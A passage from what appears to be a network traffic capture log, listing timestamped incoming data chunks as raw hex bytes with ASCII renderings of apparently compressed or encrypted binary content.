21 6a ec 93 95 b8 d1 ce 4d 2c 1a 99 13 97 f3 30 b6 20 1d Data Ascii: >3B+/-17ZLY)TRr2,BV<NSMZCA#RRre;poSi{-xt dwv//IR,!b/Mx/APpkzPs(o[\|*^BC9jI^y^uG\oIK/F\!jM,0
2023-10-13 13:21:16 UTC	8622	IN	Data Raw: 6a e6 54 85 3c 86 11 dc 19 8c fd 8c 49 15 53 1c 5a f9 d7 88 87 1c 67 0c eb 27 e4 b1 d1 46 f0 f7 06 fd 15 f7 27 32 c5 a8 cf 47 af 6b f6 ac 97 04 95 a4 9c e4 c5 4f b8 42 74 82 03 13 de 4f 28 ff 16 8e f8 92 d9 12 12 c2 0d 2d 3e a7 de e9 35 a1 39 ea 0e c6 d6 5c 4b b2 84 bb 87 45 11 e0 ad 52 a5 f0 d2 53 c3 c6 26 ab a4 b2 6a 83 db fc ea f2 0b 73 d3 3e fc ce c9 1e 7a 62 08 89 5e 0a 84 dc dc 8e ee d6 43 a4 4d 02 30 26 75 73 0f b7 28 09 18 07 81 8e c8 a9 04 13 92 18 3d cd 36 c1 ff b7 33 51 ae f0 95 b4 be 3e 91 f7 ae 95 41 20 13 93 33 36 97 5f cd 01 b9 df cf 32 94 65 05 ee bb 72 47 27 58 9e d4 09 50 73 89 dc 53 f5 c5 0e ae 02 3f 37 61 20 b4 f3 90 5b c2 de 7c 52 37 47 5f 7e cd 1d 6b 79 9f 3e e2 d4 97 c6 a0 60 a1 d8 7b d7 5b c0 dd f0 8e 7b 07 e2 1e 91 ae 1d 1b cb f6 Data Ascii: jT<ISZg'F'2GkOBtO(->59\KERS&js>zb^CM0&us(=63Q>A 36_2erG'XPsS?7a [\|R7G_~ky>`{[{
2023-10-13 13:21:16 UTC	8638	IN	Data Raw: b4 1a ae d3 5a b7 18 f4 8b d2 b2 cd 67 bc 68 34 e0 bc d0 d1 aa 7d e0 cb 7c 3b 9f e8 00 55 6e 64 69 43 2f 12 ce b7 07 5e 91 65 c7 55 d7 18 4d 70 79 85 98 e4 77 5d d6 aa c0 d0 9d 22 d3 3b 01 78 97 10 d0 fa ac a8 4a a5 9c b0 ed fd 75 82 77 0a 55 f6 98 8a 9f 00 13 85 3e c4 36 43 59 6f 1f 32 6e dd 8e 29 33 6e 07 c4 4c f7 f5 20 3f e3 64 0c 80 c3 cd 44 c5 f0 d1 b5 ae fe f3 21 15 55 09 d8 01 2d 35 fb 9b 25 0e 7b f7 6d 0c 11 74 1c fa 65 3a e9 4e 16 02 db a9 cb 02 99 ce d7 27 d0 08 b1 3c 11 d1 de ac ed 72 17 11 7b 3c f3 77 23 8b ae 58 f7 d3 b4 1e 20 83 e0 49 02 2c f7 c2 e5 e3 1a 85 2b 6b 7f 8f ee 47 fc a5 cb b2 fa f2 14 a4 29 3d 48 c6 26 83 29 08 f3 e8 69 bf 7b 3b 99 e9 99 90 91 4e 07 05 4b 25 91 61 bf f3 bb 86 5f e2 3a 7d e9 74 93 af 02 f8 40 59 71 f6 6f 61 34 2e Data Ascii: Zgh4}\|;UndiC/^eUMpyw]";xJuwU>6CYo2n)3nL ?dD!U-5%{mte:N'<r{<w#X I,+kG)=H&)i{;NK%a_:}t@Yqoa4.
2023-10-13 13:21:16 UTC	8654	IN	Data Raw: db 23 df 07 63 1e 94 60 4a 69 01 c9 12 22 bc 24 81 a2 b7 13 a4 56 a9 b9 70 f1 5e 83 37 37 c0 c6 be 8f 7f 0e 0f 4f 85 f0 2b 1e d9 48 46 9e 9d bc 41 ea bc cd 07 b2 23 da 64 eb cf af 9b c3 a4 be ad ec 40 eb 45 0b 49 3a 1b e0 88 5e b6 c1 06 21 80 d0 c5 91 a1 01 05 10 66 ef 85 e0 21 2e b0 ee ab 3e 0f d0 27 76 b5 04 40 5c 5c 1e 39 dd 0c c7 9a ba a2 84 f9 24 3f 32 02 20 99 a7 33 05 4f 8d 4e 34 27 ce ea af 49 f4 b3 00 66 20 9b 26 76 7c d8 5b eb d5 f8 d8 ca 2f 18 ac 3d c9 7c 3c 89 0e 54 11 4b 95 20 17 4d b8 c5 03 f3 22 19 47 5d 78 42 da ad cb 7a 0f 03 c7 9d bf 1a 84 ea e8 f3 21 f4 a4 51 a9 f8 11 da 96 23 dc 11 af 6d 66 c9 d3 70 25 b2 11 53 74 67 c6 f1 ad 2f 96 44 a0 89 9b 8b 73 2d 22 85 27 51 3e 47 20 d4 f0 38 63 e8 31 2e 82 2e 4b c3 3d dd 1b b1 c1 7d c3 ca d7 48 Data Ascii: #c`Ji"$Vp^77O+HFA#d@EI:^!f!.>'v@\\9$?2 3ON4'If &v\|[/=\|<TK M"G]xBz!Q#mfp%Stg/Ds-"'Q>G 8c1..K=}H
2023-10-13 13:21:16 UTC	8670	IN	Data Raw: 00 7c 88 57 51 b6 79 31 94 c1 44 77 8c 96 dd 91 29 e3 d8 6e 34 f1 b5 eb 62 c6 e5 8a 60 6d 7d ba 90 8d 8a d3 de 99 86 ab 2e a4 77 87 ce d9 fc 04 3b b4 a3 7d 23 f2 ad 54 d0 a1 25 c1 03 cf 50 6f 57 5d 63 92 39 54 fe 54 06 90 9c 87 d2 3b 64 9d 59 44 07 be 1f 31 67 86 cc 9e 3e 12 ab e2 0e 78 05 df 2f 15 58 c3 14 ea 32 34 d3 bd 93 2a 8d 49 43 3d 2b eb d3 72 1b 6d 4d 15 2b 12 c6 52 69 e0 74 d3 18 ad 48 2f cf 4e d3 57 ce 63 b5 44 b9 d4 7f 23 be 6b 36 42 7c 24 50 f8 99 0b 8b dd 97 d9 f2 32 7d 35 cc 80 e7 f2 65 82 31 d6 bb 95 61 6d 17 49 22 3f d7 cc da 89 89 5d 40 02 15 2b 66 3d d0 c0 89 a9 a2 13 2c 9b d4 ca 74 d3 98 94 4b 76 14 df 4d 7c 19 52 ac 0d d8 1c dc a9 0d de 7b c7 8b 61 0f 97 b7 a5 68 99 b5 05 b3 7f 16 7a 56 60 ad 18 2f 39 03 83 0e 68 9f b2 16 8f 82 46 4e Data Ascii: \|WQy1Dw)n4b`m}.w;}#T%PoW]c9TT;dYD1g>x/X24*IC=+rmM+RitH/NWcD#k6B\|$P2}5e1amI"?]@+f=,tKvM\|R{ahzV`/9hFN
2023-10-13 13:21:16 UTC	8686	IN	Data Raw: 8d b4 25 e6 4a c8 fc c0 48 95 cf 27 a4 75 6f fb f8 67 b0 4c d9 a4 35 78 91 31 5a 31 c5 e1 7d f7 f9 83 40 a9 7d c9 23 98 1b 2e b1 9d eb 7d d8 9d 70 7a e1 e8 90 53 36 bb b5 c3 d1 48 3a 00 04 99 55 29 18 39 b2 ab d3 93 a2 03 ed c9 c6 f8 72 3f 10 3f 6f db 7c 22 d1 30 09 be 55 6a f4 79 2a 9e 41 ec 6a bc 82 28 9d 7c fe ad 18 f1 4c 81 25 d3 81 73 1d 35 28 8f 6b e3 eb 6d df e1 f2 41 28 1f ad d0 87 79 29 4c b5 92 bd e7 48 75 ce ed 86 51 5f 31 00 0e 5c 91 56 7a 6a 82 31 48 80 38 4b c5 55 54 48 f6 83 5b 38 d7 3d ad 7b 14 f6 14 a0 f0 ea 99 7d e0 1e a7 b8 d3 f7 96 ad f0 1f 99 70 0f 76 f7 31 e4 17 35 65 f2 6d b8 96 69 0a 1a 40 ef 42 bd 98 df 2a eb d1 e1 e0 cd 3b ff d0 62 53 35 0b 67 43 fd 90 29 03 fe 10 d7 4c b0 18 13 cb a3 99 10 98 db 4d a9 6c 5b 94 ae 27 f2 06 fe 07 Data Ascii: %JH'uogL5x1Z1}@}#.}pzS6H:U)9r??o\|"0UjyAj(\|L%s5(kmA(y)LHuQ_1\Vzj1H8KUTH[8={}pv15emi@B;bS5gC)LMl['
2023-10-13 13:21:16 UTC	8702	IN	Data Raw: 72 5d 01 8b 85 1b 79 bd d1 67 d0 d8 7c c2 a0 65 20 27 c5 31 77 08 4f 86 6a e9 6d a5 7c 1b 1b b1 c0 1c ee 11 c3 7b d3 88 e8 0d 47 3c 44 6e 0b ef fb 6d 9d ed 91 4f 5d 07 c3 79 53 17 13 a5 2a 84 ff 81 6b 9b 4d f6 62 eb 76 a4 84 d3 ff 10 a3 2a 9b 0f 93 69 a6 ff 46 7c f7 26 0a db ba 17 87 9a a4 f0 f2 66 14 78 11 03 2b 92 e0 35 b6 82 35 7c 4b d8 dd 7f d4 c9 dd aa 4f 7a ef 18 43 ad 12 d8 6c 6d 89 94 d3 9a d7 b5 de 8f a6 f2 94 e4 72 f3 14 74 78 c0 3c ad e5 ad 7d 63 89 7e 5d c4 9a 4c f7 7a b3 d1 16 b5 3e a3 d0 09 21 c4 b8 09 a1 10 ff d4 4f 23 03 f8 1d 96 54 e6 cd e9 15 01 79 c5 b0 d2 b4 db 62 ae b7 dd 8b 24 e2 86 3c dd 06 2f 7f 63 ba 2c 6d d1 11 56 38 30 2c a7 9c 27 62 31 2f a5 77 f2 2f d0 1e 98 ba df da 0c 26 e8 27 c1 e3 b3 73 77 af 6c db ca 9a a7 3b 84 9c c2 60 Data Ascii: r]yg\|e '1wOjm\|{G<DnmO]ySkMbviF\|&fx+55\|KOzClmrtx<}c~]Lz>!O#Tyb$</c,mV80,'b1/w/&'swl;`
2023-10-13 13:21:16 UTC	8718	IN	Data Raw: ff f0 45 a7 6d f5 49 0c b9 40 6a 11 c1 d5 44 60 1a ec ab ad b2 e3 a3 73 66 96 77 83 8d a5 0f 2b 92 94 c8 08 b4 3c 29 ce 4e 65 c9 72 0a 99 28 de d1 d5 e0 b0 24 6c 38 ac 01 89 d5 0e eb 1d 0e ed 6f 8c 86 14 de da 52 a6 61 d7 f6 a0 3a 8f cb b4 22 a5 ff 99 c3 8c 0b 3e aa 00 22 f1 7e 71 1e 2d 4a 07 d6 6c 82 90 fa 7f f0 e3 b1 53 71 30 fb 87 86 4c eb 0d 6a 14 c2 52 ad 05 06 71 fd bd 90 6d 7d b7 5c 6d 37 cf 5b b1 93 a1 82 6f a1 17 f2 0d c6 7d 4e 55 8d 1c 18 3a 77 28 c9 b3 12 f1 1d 65 40 c0 7d 61 65 6b ba 85 02 1c d7 17 e6 a5 13 07 ed 82 b3 fa df e6 ba 10 32 9f 7c 40 2f 23 27 3c eb dd 05 5d c3 24 e8 f0 3b ad 88 43 bd 20 b2 76 5c 2a c1 cd 60 88 38 9b 23 30 84 08 8c 28 28 e3 b5 dd 27 a4 b7 59 c1 f7 82 82 c8 fe 68 4b 13 f6 0e 78 12 72 d3 f9 64 17 96 04 94 5a 84 43 d3 Data Ascii: EmI@jD`sfw+<)Ner($l8oRa:">"~q-JlSq0LjRqm}\m7[o}NU:w(e@}aek2\|@/#'<]$;C v\*`8#0(('YhKxrdZC
2023-10-13 13:21:16 UTC	8734	IN	Data Raw: 20 29 23 35 fc e8 07 93 94 b7 b1 af bc 18 23 b0 ba ae 3c b9 b4 11 94 29 7a 64 7d 8f 2c 3a ac 49 01 ef 52 e2 d7 32 db 4d 88 6b 46 94 82 80 bd bd a3 f6 e4 8d b1 7a 8d 33 90 1c ce 80 4d 79 4e 7b b5 68 20 9f f0 e5 c1 89 1f 8a 18 6f da 68 11 e2 97 51 aa 8e 32 cf 91 be d7 13 d9 52 00 6c e8 a3 64 51 bb bf 07 90 af 2a 23 82 c7 88 a3 85 da b9 98 f6 22 ed 90 e7 0d 41 a6 10 60 a3 0f 59 53 50 d6 25 69 51 15 da 66 d1 2e 3d 70 56 bc bf 61 24 22 31 0d 48 68 ec 8c a4 7c 0d f6 9a be a0 02 b6 00 ab 58 9e 2f a9 03 42 c7 f7 61 71 8f 44 97 55 e6 99 f1 10 5b 15 53 57 da de 83 a8 56 1e de d7 fb 3a e2 e0 8c b1 e1 b4 9f ac 9f 68 75 02 65 1b f5 18 21 be 33 86 8c 62 b3 78 b1 ed 4b c6 e4 4f 8c 87 86 fe 81 dc 5a 95 04 69 d6 14 13 70 07 85 b5 d6 ba f6 8e a6 24 6c 44 3a 4f 7b cc 5d 54 Data Ascii: )#5#<)zd},:IR2MkFz3MyN{h ohQ2RldQ*#"A`YSP%iQf.=pVa$"1Hh\|X/BaqDU[SWV:hue!3bxKOZip$lD:O{]T
2023-10-13 13:21:16 UTC	8750	IN	Data Raw: a5 7c 31 b9 64 a2 27 9a 51 c9 01 7a b3 e6 63 8c 0f d4 4e 3d f6 88 66 14 17 be c6 8e 54 26 d7 2e 48 69 2c 15 db f1 d8 76 e8 d4 33 f4 74 da e2 37 cc 9b 05 cd 7b 81 9a 79 e3 00 cf b0 de 2e 55 92 fd 78 68 6d 0a bf e9 ea 69 cd 9d f2 13 1e 60 d8 4e ff 49 fb cb dc 39 cd 4b 62 eb e6 99 f4 5d a3 9b 05 0d d3 2c 1b ba 1d da 15 73 35 dc fb c3 b0 09 02 11 40 3c 9e 6b e5 8c f1 ea 59 64 fe fa 5b ea 51 54 89 e3 c0 a3 29 5e e0 60 f0 2f d0 63 81 e5 d9 aa f2 cd 2d 14 a7 4c bf 66 de a2 6b 6c 21 d4 d1 1b ec 1d 7d 3d 9c f0 4c 8b b9 b2 a1 04 1d d1 a7 97 57 f5 ab 4c f7 2e 44 47 eb 08 10 29 4f 57 66 c4 b2 77 eb d5 f0 34 fe b7 10 44 b3 7e bf b7 7b 6a b7 b7 9e e5 f2 96 0f 3b 1d dd 69 44 f4 b7 5c e4 c6 be f4 db 4c 04 00 60 f8 b1 ae 64 e2 51 ef ab 09 a8 95 f1 5a 33 23 c1 32 5a 15 fc Data Ascii: \|1d'QzcN=fT&.Hi,v3t7{y.Uxhmi`NI9Kb],s5@<kYd[QT)^`/c-Lfkl!}=LWL.DG)OWfw4D~{j;iD\L`dQZ3#2Z
2023-10-13 13:21:16 UTC	8766	IN	Data Raw: 21 27 08 d8 56 ba 6f 0d 43 11 74 ad c1 bc 9e 73 65 e0 9c 4b 16 1e 2e d8 b2 30 77 d7 f8 b4 e1 98 13 35 39 6d 8a ff c9 43 b6 ac 9d 08 56 d2 8b 1b ed 93 83 ca b9 00 43 28 6f 39 99 5b 14 d0 60 0f 02 b4 4f 1c 03 59 60 08 fe 0d eb 84 de 89 eb 96 e9 29 c9 a5 79 ef 1f 37 67 a4 6c 34 af e6 12 e0 bf a4 38 17 ce ff 41 5c 70 1c 51 72 ec cc 86 00 c3 fb 1a 80 57 49 5e ff 06 17 ae e1 08 6f 6d 4b 6c e8 67 a0 4d 18 c0 1f b3 b7 05 61 66 b3 f9 75 45 99 79 2c af 78 26 c3 4b 98 66 bc ec 1b f6 47 b8 b6 c3 06 59 e8 6c be 6b 43 29 1a 7c e0 b0 09 96 0d 64 2c 4a 87 23 5f b8 97 f0 04 fb be 8d 08 a4 bf 66 0f cd 01 e4 97 df cb a1 10 1f 46 43 b8 e6 40 6c 64 5c 38 1b bb 92 f3 8a 25 37 0d 3c 8c 15 46 65 0b 43 9e 60 f1 d4 70 41 9e e0 ba 8f 59 ef ed 2d 4a 5c 83 89 df 9b 07 b3 14 04 49 54 Data Ascii: !'VoCtseK.0w59mCVC(o9[`OY`)y7gl48A\pQrWI^omKlgMafuEy,x&KfGYlkC)\|d,J#_fFC@ld\8%7<FeC`pAY-J\IT
2023-10-13 13:21:16 UTC	8782	IN	Data Raw: 1c a3 0a 7e 90 8d d8 4f 80 e4 2e 68 53 c5 35 1f 40 71 79 ee fa 7e 4e f9 26 6f 40 8d 1a 8e b5 c4 49 74 44 d6 a6 23 84 7d e0 db 30 eb 13 67 aa 84 55 70 2f f5 a4 95 12 6f cd 90 d4 b5 28 8a 29 f4 a6 63 a7 8d c7 36 da 86 82 b6 99 37 67 f0 38 93 f3 91 0d 09 25 c8 98 25 6a 63 f9 1b cb b3 bb 00 7e 7a b3 bd c4 be 24 cc 72 53 85 38 a0 43 82 17 ff 76 cc e1 17 e8 b4 a7 a3 6e 00 1f f6 b9 13 f3 25 f2 fd d5 62 37 fb da 2d 9c 73 28 cb 27 38 44 5b 14 bd d9 13 70 3f c0 d3 76 86 61 58 bb 86 33 3b c1 83 1e 30 b4 2e 84 8b 4e e0 30 e0 8b 40 6b 74 4a b0 a7 f1 ba 79 52 6f 25 2e 48 76 66 ca fa 5b 3d bd c3 08 83 ec a3 93 14 71 83 7b ac da 73 10 3d 5a cf c8 a8 98 f5 d7 62 d1 fd 72 ce bc f2 9a d2 75 30 eb aa 48 13 b9 ff a5 74 48 bb dc 33 bd e3 7c 7b 08 b5 d2 26 fa 97 d5 ad 6b cf 88 Data Ascii: ~O.hS5@qy~N&o@ItD#}0gUp/o()c67g8%%jc~z$rS8Cvn%b7-s('8D[p?vaX3;0.N0@ktJyRo%.Hvf[=q{s=Zbru0HtH3\|{&k
2023-10-13 13:21:16 UTC	8798	IN	Data Raw: 08 b0 9d 39 9d 59 03 9e 32 fe b3 d4 f3 9a 6b c3 43 f2 2e 1b b9 be 4e 03 67 56 26 e3 90 38 2d 33 91 7f 52 c7 06 9c 23 eb 44 a4 16 d6 53 5c d4 39 1b d4 8e 59 6d c1 a6 be 70 7a e8 8a 5e ed 5e 5a 3e 92 99 3b 41 bf af 2a 1e 6b 6b 4f f9 30 22 74 3c e9 4f da a4 43 7c 96 85 d0 cb 0f 8a b0 40 27 7b 8e 7f bc 93 e5 8c dc d8 7f f3 1b 38 86 f1 05 67 8d 27 ac fe 6c 8f bf 21 99 98 44 4a a4 68 34 af c5 37 1a 48 67 8e 23 3d 18 cb f5 37 5c 03 37 9c 98 61 ca 2e bc 0f 2d 2f d1 47 7e 52 e5 89 ad fd 95 f9 b2 cb 5a f0 55 b5 d5 c3 32 e9 a9 69 d2 dd 2a e4 81 b1 de 62 a4 b3 14 d0 93 b5 39 ad 24 af 45 f0 0c 96 81 cd e3 40 75 47 fa d1 1c 98 f8 d8 33 2f 00 43 2e 0d 4a 36 3b b7 65 5b ca 39 78 ff 1b c9 69 1c af 24 0b 03 90 19 7d b6 31 93 85 5e 6e a1 e1 a0 5e 04 de d6 00 e7 a5 3e b8 d4 Data Ascii: 9Y2kC.NgV&8-3R#DS\9Ympz^^Z>;AkkO0"t<OC\|@'{8g'l!DJh47Hg#=7\7a.-/G~RZU2ib9$E@uG3/C.J6;e[9xi$}1^n^>
2023-10-13 13:21:16 UTC	8814	IN	Data Raw: 32 21 37 f6 d5 74 54 7b 9f 87 49 d4 37 94 87 37 9d fa e8 d1 4a 9c 71 cb 74 7f 4f 7e 60 fa ec df 22 26 62 e9 1a 18 1e 4c 1b 12 4f 9b fb a9 c7 a0 c8 5c f5 a3 a5 99 58 52 2f 75 36 f6 e1 4e d9 ad 6c e2 1a 28 c3 5f 82 ce 9e 9d 6d 2d 7c 22 cc 51 fd 89 e0 97 fe 54 37 36 20 14 46 3e a8 a0 95 2b 89 4d 70 3a c8 6f 85 c4 2c 03 3c 38 43 4d 1b bc 77 02 7e ee 71 2f cf 17 2a b3 87 f8 85 57 82 ed 2d b7 45 62 f3 da 9a c3 a8 93 22 e5 f0 e4 af 4b 74 25 4a 01 cb 06 51 ae c3 b5 d7 1f 1f ae 46 44 56 e7 03 a9 89 35 c8 d1 42 c0 c4 88 91 4c 75 ea 45 a0 35 7f a8 04 cd 7f 1e 66 ec 1f d2 e9 5d 4b dc 20 f9 dc f1 18 1d f8 1f 44 ed e9 18 45 da 60 c0 a4 57 19 74 5f 9a 15 f0 ee a6 2e aa 40 38 a8 d6 69 0b 9e d8 cf 00 7f e9 36 68 bc 79 dc 77 3c b4 81 10 6f 22 ba dc fd d6 4a 98 28 2f 90 c1 Data Ascii: 2!7tT{I77JqtO~`"&bLO\XR/u6Nl(_m-\|"QT76 F>+Mp:o,<8CMw~q/*W-Eb"Kt%JQFDV5BLuE5f]K DE`Wt_.@8i6hyw<o"J(/
2023-10-13 13:21:16 UTC	8830	IN	Data Raw: 6f 64 1b d2 33 49 c6 c8 07 af 86 6d 81 bf bb fd fb e9 92 f1 b3 48 75 ec fa 29 a4 50 42 6e 73 fe 17 ff 70 41 10 f7 ea 97 30 c5 83 86 2a c7 c8 51 b4 4b 72 5e e9 88 b3 d9 c9 6e 0c 7b 6b 56 0e 6e d4 2d 3e ca e9 9b 4b 0e c4 b7 a3 6e 22 16 20 a2 3f 56 25 89 27 57 5a a7 9f 01 01 07 80 f8 04 b6 0b 14 63 80 87 fd ea 2a 3f d0 e1 59 f8 48 f7 eb 7b 13 ce 9a f0 c1 86 ae 62 52 5e 3a e1 02 4c e3 22 ab 49 c2 ad 3f 70 70 a0 60 20 17 ad 72 fc e8 c0 51 14 03 4a 7b ab d0 ce 2e a0 dc ca 3c bb ac 12 e6 24 f4 b6 ae 3f 2d 15 de e1 6d 5f cc 55 70 d8 05 5f d6 2b 56 52 9f 51 c4 59 86 66 bc 1e 4b f1 c6 97 09 1f 83 d8 ec f6 85 c2 49 7d 03 83 a8 1c b5 5f e9 ba 5c 0f 08 81 14 85 93 d6 fc 28 e8 fd bb d4 c4 ab 82 c2 d6 57 88 09 4e 92 d3 f0 02 cd 22 5f 52 ed c6 8d 1d bc 34 ce 3d 1d 62 0f Data Ascii: od3ImHu)PBnspA0QKr^n{kVn->Kn" ?V%'WZc?YH{bR^:L"I?pp` rQJ{.<$?-m_Up_+VRQYfKI}_\(WN"_R4=b
2023-10-13 13:21:16 UTC	8846	IN	Data Raw: 23 90 65 c6 71 65 af 0a 6a d0 ef 84 62 e7 00 e5 b7 d3 d9 59 c3 2a 17 d4 1a a9 f8 ae d9 8e 7f e8 ae 2b 6e bf 4c f0 12 20 dd a5 a6 64 0c 10 f7 48 83 a6 e2 ff 4b ef 4e fc 57 e0 50 d0 f5 90 a5 e3 dd 7a 8b 86 91 fd 81 74 c2 1c 58 ab a8 da dd f9 84 49 d9 9d 91 2b cc 60 01 87 dc 64 e2 55 b7 59 04 f3 99 d8 e9 d3 28 65 8c d8 13 5c 86 40 ce 6e e5 8f 21 11 31 6b 20 5d d2 82 a7 23 3c 65 e2 13 a2 61 92 85 8c 54 bf 22 63 3e 7d b2 36 31 24 dc 4c 5b cf 2a 19 42 e1 91 90 ea 16 b2 1b 14 35 9f 66 df 5b 26 3b 2d dd 2c 48 ec e4 45 2c ff d8 39 f9 a2 7e af e8 fa c8 ae 23 6f 8c 05 ea 4f aa f4 5e b0 c3 fc 20 82 d9 bc f3 07 a0 5f 19 b6 74 6b 7a c8 f2 12 23 02 7d 01 f7 4f bd 19 49 8b 63 f5 64 a7 5e 3a c7 d8 3b 5f cc 55 b3 60 ab a9 e4 ae fc 12 e6 6c 2a 03 2e 6b 9a 96 f0 92 3c d5 a7 Data Ascii: #eqejbY+nL dHKNWPztXI+`dUY(e\@n!1k ]#<eaT"c>}61$L[B5f[&;-,HE,9~#oO^ _tkz#}OIcd^:;_U`l*.k<
2023-10-13 13:21:16 UTC	8862	IN	Data Raw: 91 7d a7 17 b7 fe 70 5b 8f 06 46 39 e6 fc c7 af 21 56 09 49 1c f9 05 42 12 84 2d e8 a4 f9 67 d7 1a e3 eb 2e b8 4d 40 a2 70 ac 44 54 01 87 e9 ef 94 af 5f ca 5b 20 20 66 8f cf 46 cc 99 01 ba 6f 14 2a 3e 42 59 18 8f 42 b7 df b6 ea 75 00 35 a6 53 98 68 9c 7a e7 41 17 d3 92 7a 9b 26 60 43 4c 63 af e3 f5 1e 2e 9f af b2 62 c3 2c 09 cf ab f1 2c 16 40 e4 0c da d4 b7 00 16 b5 8e b6 7f 0c 0f f8 f5 7f 28 cc f1 80 46 1f 87 4b 7c bc 72 e8 e7 41 71 0a 54 68 2a 1e 96 25 90 23 4b 45 69 05 f3 0a 60 aa 6d 12 94 bd c7 75 c7 66 25 20 8e 2a 0a 6a 21 0d 93 dd 06 7d 6c 83 52 74 9c 50 f1 fd e6 ad 90 da 0f ac 97 99 8e d9 67 da 26 d2 ff 11 e2 27 59 e0 56 94 c8 d6 5a b0 ed 98 9c 48 21 df 41 15 44 cf a7 08 90 c2 76 b4 fb 6a 96 d3 05 e9 4f 7a 97 d2 ec 4f 0f b1 a4 9c c7 1a 61 5e 90 8c Data Ascii: }p[F9!VIB-g.M@pDT_[ fFo>BYBu5ShzAz&`CLc.b,,@(FK\|rAqTh%#KEi`muf% *j!}lRtPg&'YVZH!ADvjOzOa^
2023-10-13 13:21:16 UTC	8878	IN	Data Raw: ac ff 68 d8 5b c3 10 28 d9 26 c2 70 a2 58 0f 72 bd 2e 08 85 f8 d1 fe a2 c4 5d 9d c2 6b 78 18 43 e2 17 6b b9 be 38 96 ab 10 84 e4 55 08 38 e1 f2 e2 80 e3 c4 e4 98 17 d7 a6 09 58 51 f8 82 c4 2a 01 0e 84 a3 3d e1 23 4e 7e 45 06 f2 c9 e4 8e 0a b4 c6 09 58 e4 ed 9f 55 fc b5 08 49 13 2c 13 23 47 3b 6a 4e 82 24 fb d3 7f 0a 51 be 2e c9 4a 17 c8 98 31 01 ab f0 ec 76 38 dc 5f 75 29 ac b8 93 3f 74 0f 81 1f 4e 2e 17 c5 94 bc 5a 9e 0a 57 cc 58 e6 8e c9 6d b6 71 ca 53 80 5e 59 86 ff 50 6b fb 17 85 4b 80 0e b6 9c 28 f1 e3 c8 fc 0c 05 2c 66 11 a6 fd 01 13 34 9a c2 dd 6a 07 ee fe 3c dd 37 fe 81 dc ce a1 be cc 14 bd d6 2b c0 39 4b cd 9c 1c a3 90 36 eb 15 57 5d e2 52 11 4d b8 69 35 34 93 75 51 03 ab af 7b d9 6b 70 3b 55 35 d6 53 30 c3 11 71 98 be be 16 fe b9 7e 07 dc c3 09 Data Ascii: h[(&pXr.]kxCk8U8XQ*=#N~EXUI,#G;jN$Q.J1v8_u)?tN.ZWXmqS^YPkK(,f4j<7+9K6W]RMi54uQ{kp;U5S0q~
2023-10-13 13:21:16 UTC	8894	IN	Data Raw: df de 0d 4b e0 e5 1e bf 98 e7 2e 66 6b 60 a3 a3 2b b7 83 91 a6 4f e1 27 05 79 f9 5e a4 78 58 85 60 72 a7 f1 a6 14 33 44 a2 07 09 62 eb 84 74 29 6e c5 3f b5 23 5b ce 48 38 27 14 08 53 b7 dd b8 66 de 6a 85 ec a2 f1 9e db 8c be 48 d2 ce f6 b1 60 b2 98 0f b2 f1 bb 5f 84 fd 96 36 8b bf 73 be 5e 95 45 ea 58 a8 66 0a 5e 85 fe 16 89 f7 2d b5 b2 6f a7 12 05 65 59 5d 09 ef 01 f1 b6 f5 b3 fa 59 31 c6 1d e2 72 6f 0d f1 03 0f ea a5 bd 44 2f 90 d2 f0 d5 f4 27 9a 60 33 6c be 0c 2d c8 14 c0 ba 10 28 4a c0 47 8e f1 92 8b ec f4 66 31 de 49 66 41 36 b3 45 9a 13 f6 93 c2 5e 6a d5 3b d3 56 57 ef b4 7e a6 7b cb 22 d8 ed 5e 0c 20 1a 67 51 6f d4 38 99 d3 b0 fc 29 7d 28 10 71 ca 79 79 76 e1 ff d0 41 63 d3 c8 a0 18 09 ac dd f7 6b 20 8e 6c 9d 48 a4 26 f2 fb ad f4 76 5b dd 84 c9 97 Data Ascii: K.fk`+O'y^xX`r3Dbt)n?#[H8'SfjH`_6s^EXf^-oeY]Y1roD/'`3l-(JGf1IfA6E^j;VW~{"^ gQo8)}(qyyvAck lH&v[
2023-10-13 13:21:16 UTC	8910	IN	Data Raw: a2 26 77 a1 2f ed be 99 7d d7 73 26 53 72 33 3c 58 19 1f f3 47 4d 74 de a1 0b 9f 06 2d ab 03 29 9a c4 0b 22 1b 02 56 25 fb 81 51 7e ec df 30 f6 c5 09 39 91 a8 0c 72 46 2e c5 2f 08 66 2c 29 10 3a 84 8d ac d4 fd ec 36 5a 26 e2 e5 ee 3e 38 20 2f 5b d6 e2 17 09 d4 f5 c9 57 f9 53 85 5b b1 7c 8e c5 62 b9 14 29 a3 27 da 00 d7 e9 86 f5 bc 2a ed 7c b7 95 f6 3a bb 74 06 9f 35 52 ed 2c 6d cc 08 6d 9b 20 e5 da 47 08 24 0f c8 d6 f4 ca 0c b3 1c d9 0f 6e 31 b4 1b 70 0f 38 ae db 44 29 e4 f5 d7 7a d4 a0 24 f2 d9 e7 74 78 31 72 28 72 93 8c e1 5b 09 09 7d 04 f7 f1 c1 f6 29 9f cd f6 fc 7c 43 bd 3c f5 1a a3 7d 15 c9 f1 d3 99 aa e5 39 27 66 bc 0e 92 53 f9 1a db 35 04 ef 52 27 de d6 68 6c ec fc ec 63 af f5 46 40 3c 10 09 cc d0 da 56 27 9e 65 ea 9d 29 0d 11 ae fd 27 9a de ef 5b Data Ascii: &w/}s&Sr3<XGMt-)"V%Q~09rF./f,):6Z&>8 /[WS[\|b)'*\|:t5R,mm G$n1p8D)z$tx1r(r[})\|C<}9'fS5R'hlcF@<V'e)'[
2023-10-13 13:21:16 UTC	8926	IN	Data Raw: 32 bb 9d 0b 95 3c 66 16 5c d5 11 75 35 35 2f 7f 90 fe e9 69 7f b2 fc 1f 8b 21 a8 97 03 75 dc 58 72 0e 93 ef 60 23 16 ce fa f6 23 d6 ff ce 72 16 ca a0 ce 0e 62 cd d1 8b a4 69 75 03 97 c2 34 7f db f5 9b 28 38 f5 48 ba f8 68 00 14 f2 ea 57 12 dc 6e 0e bc 27 68 46 0b 32 dc c4 27 a4 f2 92 48 13 65 2d e3 f8 08 d1 d8 8a 5b 19 ea 94 d0 d3 54 65 f7 3b eb 1d 07 0e e2 d6 51 f5 c2 88 2b 33 d6 61 ec 57 f5 f4 d3 ec e4 44 35 f8 d8 07 52 d2 9e 0b 2d 43 de 9a 15 bc 4f dd 67 3b 35 00 e1 8e 81 3f 82 48 53 0e 4e b5 7e 9f 6b 4d 47 84 7a 2c c4 08 14 74 dc 08 8d 45 97 8e 95 21 07 b8 e3 56 ae 56 70 79 ec 90 0d c3 28 89 96 e6 71 e4 32 60 cf a7 91 10 a5 6e c5 9e 26 bd 1a 2d fb d4 59 46 1b 6a 